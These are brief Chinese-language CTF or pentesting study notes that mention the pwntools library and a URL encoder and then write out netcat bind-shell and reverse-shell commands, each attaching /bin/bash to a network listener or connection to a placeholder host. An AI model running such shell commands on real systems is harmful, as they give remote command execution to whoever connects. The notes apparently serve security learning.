# pwn
用pwn库，不用每次编写原生socket

> https://docs.pwntools.com/en/stable/intro.html

1. remote/process/ssh
2. elf
3. gdb

# url
> https://www.urlencoder.org/

# 常用技术
## nc隧道技术
1. 正向shell(客户端向服务器发送命令)
```shell
# server
nc -l -p 1337 -e /bin/bash
# client
nc hostname port
```
2. 反向shell(服务器向客户端发送命令)
```shell
# server
nc -l -p 1337
# client
nc hostname port -e /bin/bash
```